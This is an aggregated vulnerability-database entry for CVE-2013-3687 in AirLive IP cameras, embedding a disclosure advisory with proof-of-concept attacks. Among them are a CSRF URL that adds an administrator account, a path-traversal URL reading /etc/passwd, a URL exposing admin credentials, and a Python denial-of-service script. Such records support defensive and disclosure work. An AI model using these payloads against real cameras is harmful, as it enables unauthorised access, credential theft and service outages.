ID

VAR-201310-0205


CVE

CVE-2013-3687


TITLE

Vulnerability in multiple AirLive products that allows important information to be obtained

Trust: 0.8

sources: JVNDB: JVNDB-2013-004610

DESCRIPTION

AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models use cleartext to store sensitive information, which allows attackers to obtain passwords, user names, and other sensitive information by reading an unspecified backup file. Airlive IP Camera is an IP camera device. Multiple Airlive IP Cameras are prone to an information-disclosure vulnerability. Information obtained will aid in further attacks.

===========================================================================
AIRLIVE
===========================================================================

1. Advisory Information

Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2. Vulnerability Description

Multiple vulnerabilities have been found in these devices:

-CVE-2013-3540. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)
-CVE-2013-3541. Relative Path Traversal (CWE-23).
-CVE-2013-3686. Information Exposure (CWE-200) and Permissions, Privileges and Access Controls (CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3691. Denial of Service

3. Affected Products

CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected but they were not checked.

4. PoC

4.1. Cross Site Request Forgery (CSRF)

CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________

4.2. Relative Path Traversal

CVE-2013-3541, Transversal Path that allows you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________

4.3. Sensitive Information Exposure + Privilege Escalation

CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64). You can open with any text editor and look for user's information, for example, passwords, users and so on.

4.5. Denial of Service (DoS)

Use CVE-2013-3691, DoS by overbuffing path '/'. A request with a large number of 'a' can take down the http service from the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message: Conexion has been reset.
After removing the adds and refreshing it you will get the next message: Can't Connect
It will be down for around 2min, but if we are doing the request once and again each 1min, for example, the camera won't ever recuperate by itself.
The following Python script could be used to test the DoS:
_____________________________________________________________________________
    import socket

    # cam_ip: address of the camera under test (not defined in the advisory)
    request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n'
    s = socket.socket()
    s.connect((cam_ip, 80))
    s.send(request)
    response = s.recv(1024)
    s.close()
_____________________________________________________________________________

5. Credits

-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo.

6. Report Timeline

-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities

Trust: 2.52

sources: NVD: CVE-2013-3687 // JVNDB: JVNDB-2013-004610 // CNVD: CNVD-2013-07702 // BID: 60551 // PACKETSTORM: 122001

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-07702

AFFECTED PRODUCTS

vendor: ovislink, model: airlive poe250hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: airlive od-2025hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: airlive poe100hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: airlive poe200hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: airlive od-2060hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: airlive poe2600hd, scope: eq, version: -

Trust: 1.6

vendor: ovislink, model: od-2025hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: od-2060hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: od-325hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: poe-100hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: poe-200hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: poe-250hd, scope: -, version: -

Trust: 0.8

vendor: ovislink, model: poe-2600hd, scope: -, version: -

Trust: 0.8

vendor: airlive, model: ip camera poe100hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera od-2060hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera od-2025hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera od-325hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera poe200hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera poe250hd, scope: -, version: -

Trust: 0.6

vendor: airlive, model: ip camera poe2600hd, scope: -, version: -

Trust: 0.6

vendor: ovislink, model: airlive poe-2600hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive poe-250hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive poe-200hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive poe-100hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive od-325hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive od-2060hd, scope: eq, version: 0

Trust: 0.3

vendor: ovislink, model: airlive od-2025hd, scope: eq, version: 0

Trust: 0.3

sources: CNVD: CNVD-2013-07702 // BID: 60551 // JVNDB: JVNDB-2013-004610 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-3687
value: HIGH

Trust: 1.0

NVD: CVE-2013-3687
value: HIGH

Trust: 0.8

CNVD: CNVD-2013-07702
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201306-348
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2013-3687
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2013-07702
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-07702 // JVNDB: JVNDB-2013-004610 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

PROBLEMTYPE DATA

problemtype:CWE-310

Trust: 1.8

sources: JVNDB: JVNDB-2013-004610 // NVD: CVE-2013-3687

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201306-348

TYPE

encryption problem

Trust: 0.6

sources: CNNVD: CNNVD-201306-348

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-004610

PATCH

title: Airlive IP Kamery, url: http://cz.airlive.com/product/category/Network-Surveillance

Trust: 0.8

sources: JVNDB: JVNDB-2013-004610

EXTERNAL IDS

db: NVD, id: CVE-2013-3687

Trust: 3.4

db: BID, id: 60551

Trust: 1.5

db: JVNDB, id: JVNDB-2013-004610

Trust: 0.8

db: CNVD, id: CNVD-2013-07702

Trust: 0.6

db: FULLDISC, id: 20130612 SECURITY ANALYSIS OF IP VIDEO SURVEILLANCE CAMERAS

Trust: 0.6

db: CNNVD, id: CNNVD-201306-348

Trust: 0.6

db: PACKETSTORM, id: 122001

Trust: 0.1

sources: CNVD: CNVD-2013-07702 // BID: 60551 // JVNDB: JVNDB-2013-004610 // PACKETSTORM: 122001 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

REFERENCES

url:http://seclists.org/fulldisclosure/2013/jun/84

Trust: 3.3

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3687

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3687

Trust: 0.8

url:http://www.securityfocus.com/bid/60551

Trust: 0.6

url:http://www.airlive.com/product/category/network-surveillance

Trust: 0.3

url:http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-3541

Trust: 0.1

url:http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=general.userid

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-3687

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-3540

Trust: 0.1

url:http://xx.xx.xx.xx/cgi-bin/admin/fileread?read.filepath=../../../../etc/passwd

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-3686

Trust: 0.1

url:http://xx.xx.xx.xx/[a*3000]

Trust: 0.1

sources: CNVD: CNVD-2013-07702 // BID: 60551 // JVNDB: JVNDB-2013-004610 // PACKETSTORM: 122001 // CNNVD: CNNVD-201306-348 // NVD: CVE-2013-3687

CREDITS

Jonás Ropero Castillo

Trust: 0.6

sources: CNNVD: CNNVD-201306-348

SOURCES

db: CNVD, id: CNVD-2013-07702
db: BID, id: 60551
db: JVNDB, id: JVNDB-2013-004610
db: PACKETSTORM, id: 122001
db: CNNVD, id: CNNVD-201306-348
db: NVD, id: CVE-2013-3687

LAST UPDATE DATE

2025-04-11T22:24:56.548000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2013-07702, date: 2013-08-29T00:00:00
db: BID, id: 60551, date: 2013-06-12T00:00:00
db: JVNDB, id: JVNDB-2013-004610, date: 2013-10-16T00:00:00
db: CNNVD, id: CNNVD-201306-348, date: 2013-10-15T00:00:00
db: NVD, id: CVE-2013-3687, date: 2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2013-07702, date: 2013-06-20T00:00:00
db: BID, id: 60551, date: 2013-06-12T00:00:00
db: JVNDB, id: JVNDB-2013-004610, date: 2013-10-16T00:00:00
db: PACKETSTORM, id: 122001, date: 2013-06-13T05:42:00
db: CNNVD, id: CNNVD-201306-348, date: 2013-06-20T00:00:00
db: NVD, id: CVE-2013-3687, date: 2013-10-11T21:55:44.247